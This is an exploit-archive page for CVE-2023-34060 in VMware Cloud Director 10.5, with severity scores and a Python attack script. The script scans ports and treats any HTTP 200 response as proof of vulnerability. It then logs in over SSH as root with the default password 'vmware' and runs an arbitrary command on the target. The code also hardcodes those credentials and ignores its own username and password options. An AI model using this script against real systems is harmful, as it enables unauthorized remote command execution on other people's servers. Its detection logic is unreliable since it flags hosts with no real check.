VMware Cloud Director 10.5 - Bypass identity verification Exploit

2024-03-1200:00:00

Abdualhadi khalifa

0day.today

vmware cloud director

bypass identity verification

exploit

cve-2023-34060

ssh

port scanning

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8 High

AI Score

Confidence

Low

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

42.1%

JSON

# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]
import requests
import paramiko
import subprocess
import socket
import argparse
import threading

# Define a function to check if a port is open
def is_port_open(ip, port):
    # Create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Set the timeout to 1 second
    s.settimeout(1)
    # Try to connect to the port
    try:
        s.connect((ip, port))
        # The port is open
        return True
    except:
        # The port is closed
        return False
    finally:
        # Close the socket
        s.close()

# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
    # Create a ssh client object
    client = paramiko.SSHClient()
    # Set the policy to accept any host key
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Connect to the target using the credentials
    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
    # Execute the command and get the output
    stdin, stdout, stderr = client.exec_command(command)
    # Print the output
    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
    # Close the ssh connection
    client.close()


# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()

# Loop through the ports and check for the vulnerability
for port in args.ports:
    # Check if the port is open
    if is_port_open(args.ip, port):
        # The port is open, send a GET request to the port and check the status code
        response = requests.get(f"http://{args.ip}:{port}")
        if response.status_code == 200:
            # The port is open and vulnerable
            print(f"Port {port} is vulnerable to CVE-2023-34060")
            # Create a thread to exploit the device
            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
            # Start the thread
            thread.start()
        else:
            # The port is open but not vulnerable
            print(f"Port {port} is not vulnerable to CVE-2023-34060")
    else:
        # The port is closed
        print(f"Port {port} is closed")